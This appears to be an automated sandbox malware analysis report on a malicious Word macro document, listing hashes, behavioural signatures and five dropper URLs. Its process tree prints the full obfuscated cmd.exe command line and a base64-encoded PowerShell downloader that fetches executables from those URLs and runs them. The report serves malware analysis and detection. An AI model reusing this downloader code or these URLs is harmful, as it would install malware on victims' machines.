Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
14-06-2024 01:05
General
-
Target
a774d6487dc1a0649813a124beffebdd_JaffaCakes118.doc
-
Size
93KB
-
MD5
a774d6487dc1a0649813a124beffebdd
-
SHA1
ed860962c0c6bdb2146ce75af56e094dbfa7e4ce
-
SHA256
8d9e4d35475f67fa6a7afd266223740d67c834b848d2f410d783ef834531700e
-
SHA512
28b0d6493a9cdd2444955c977118c94ca1d47d75cd8a8eed354bad724fb47c92f755acd7808d228b94e2950db5155a0eb10de2eba3f3f550a07ed6a0b1ce9033
-
SSDEEP
1536:xptJlmrJpmxlRw99NBL+aL+PkEaaXQiFKLd:vte2dw99fykBaXQi
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://webmounts.co.ke/rmFksbPG
exe.dropper
http://pengacaraperceraian.pengacaratopsurabaya.com/s6
exe.dropper
http://wp1.lukas.fr/9lvv9kkr
exe.dropper
http://marbdobrasil.com/3X
exe.dropper
http://repro4.com/website/wp-content/uploads/Hbdsm
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a774d6487dc1a0649813a124beffebdd_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V^:On/C " ^S^et ^ ^ ^ ^s^57W=A^AC^A^g^A^A^IA^AC^AgA^AIA^AC^A^g^AAIAAC^Ag^A^AIA^ACA^gAA^IAACA^g^AQf^A0HA7B^AaAMGA0B^QYAMGA^9BwO^A^sG^A^h^B^QZ^AI^HA^iB^w^OA8G^A^m^Bgc^A^QCA^gA^Qb^A^UG^A0BQ^SA0CAl^B^w^aA8GA^2^BgbAkE^A7^AQ^KA^8^G^AmBgcAQC^A^gAAL^Ak^F^AvBQ^SAQC^A^oAQ^Z^A^wG^A^pB^gRAQGA^hB^wb^Aw^GAuBwdA^8^GA^EB^gLA^I^GA^0BwSAQCA^7^BQ^e^A^I^HA^0B^w^e^AkC^Av^BQT^A^oGAkA^AI^A4G^ApB^A^IA^kF^AvBQSA^QC^A^o^AA^aA^M^GAh^B^Q^Z^AIH^Av^B^g^ZA^sD^AnA^QZ^A^g^H^A^l^Bg^L^AcCArA^AR^AIGA^i^BA^JA^sCAn^A^AXAcC^ArA^wYAk^GAs^BgY^A^UH^A^wBg^OA^Y^H^A^uBQ^ZA^QCA^9^Aw^b^AYG^A^y^B^AJ^As^D^AnAQN^AA^DAx^Aw^J^AAC^A9AA^I^AQE^Ai^Bg^Y^A^QC^A7^AQ^KAcC^A^A^Bw^J^A^gCA^0BQa^A^wGAwB^w^UA^4CAn^A^Qb^A^M^H^Ak^Bg^Y^A^gE^Av^AwcA^Q^G^AhB^wbA^w^GAwBQ^d^A^8CA^0^B^g^bAUG^A^0^Bg^bA^8G^AjBQ^L^AAHA3BwLAU^G^A0B^QaAMHAi^BQ^ZAcHAvA^Q^bA8G^Aj^B^gL^A^Q^D^Av^Bgc^A^A^HAl^Bgc^A8C^Av^Ag^O^AA^H^A^0BAd^Ag^G^AA^BA^W^A^MDAvA^QbA^8GAj^B^gLA^w^G^A^pB^wcA^EGAy^B^g^Y^A8G^Ak^B^gY^A^IH^Ah^BQb^A^8CAvAg^O^A^A^H^A^0BAd^A^g^GA^A^Bgc^A^s^G^Ar^B^QOAYHA^2^BAb^A^kDAvAgc^A^Y^G^A^u^Awc^A^E^GAr^B^Qd^A^wG^AuA^Q^MAA^HA3^BwLA^8CA^6^A^AcAQHA0^BAaAAEA2A^wcA8C^At^B^wbA^M^G^AuA^QYA^kH^A^h^Bg^YAE^G^AyBQ^dA^M^H^Aw^B^w^bAQ^H^Ah^BgcAE^GA^jB^QYAc^G^A^u^B^QZ^A^A^H^Au^A^g^bAE^G^Ap^BQ^Y^AI^H^A^l^B^w^Y^AI^H^A^l^B^AcAE^G^A^yBQ^YA^M^G^AhB^wZ^A4^G^A^lB^Ac^A8C^Av^AgOAA^HA^0B^A^d^A^gGAA^B^wRAA^F^AiB^wc^As^G^A^G^B^Q^bA^I^HAv^AQZA^sG^Au^Aw^b^AM^GAu^AwcA^Q^H^A^uB^QdA8G^At^B^g^YAU^G^A^3B^wLA8CA6AAc^AQ^HA0B^Aa^AcCA^9A^wbA0EA^q^BA^J^AsDA0B^g^b^A^UG^ApBA^b^AM^E^A^iBQZ^AcF^Au^A^A^dAU^G^A^O^BAIAQHA^jBQ^Z^A^oGA^i^B^wbA0CA3^BQZA^4^G^A^9A^g^YA^Q^H^AL^BA^J^ ^e- ^l^l^eh^sr^ewo^p& f^oR /^L %^G ^IN (^ ^ ^ ^10^61,^ ^ ^-1^ ^ ^ ^,^ 0 ^ ^ )d^O ^sE^t ^t^Kz=!^t^Kz!!^s^57W:~ %^G, 1!&& ^i^F %^G L^E^Q ^0 ca^l^L %^t^Kz:~^ ^ ^-^1^062% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABLAHQAYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABqAE0AbwA9ACcAaAB0AHQAcAA6AC8ALwB3AGUAYgBtAG8AdQBuAHQAcwAuAGMAbwAuAGsAZQAvAHIAbQBGAGsAcwBiAFAARwBAAGgAdAB0AHAAOgAvAC8AcABlAG4AZwBhAGMAYQByAGEAcABlAHIAYwBlAHIAYQBpAGEAbgAuAHAAZQBuAGcAYQBjAGEAcgBhAHQAbwBwAHMAdQByAGEAYgBhAHkAYQAuAGMAbwBtAC8AcwA2AEAAaAB0AHQAcAA6AC8ALwB3AHAAMQAuAGwAdQBrAGEAcwAuAGYAcgAvADkAbAB2AHYAOQBrAGsAcgBAAGgAdAB0AHAAOgAvAC8AbQBhAHIAYgBkAG8AYgByAGEAcwBpAGwALgBjAG8AbQAvADMAWABAAGgAdAB0AHAAOgAvAC8AcgBlAHAAcgBvADQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEgAYgBkAHMAbQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAYgBiAEQAIAA9ACAAJwAxADAANQAnADsAJAByAGYAbwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABiAGIARAArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQASQBvAFkAIABpAG4AIAAkAGoATQBvACkAewB0AHIAeQB7ACQASwB0AGIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASQBvAFkALAAgACQAcgBmAG8AKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBmAG8AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD55b0deb85403bf6edc1937aa083fa64d1
SHA1b00a396976e4dddd2c08000b8b833eb46ba20c41
SHA256898a8e65f2306f7716fad35144da56e3d14849e9423e1029ca42a694daef78fb
SHA512f00134880ec88f0bcd5b09b46d23b0d255cb6f88ad5ad6706933ea8b06bfaeb7b655b53f50afd8184664f55bdf53835a3aacb0ffe8f2e8b2dce0372f47f40be2
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4KB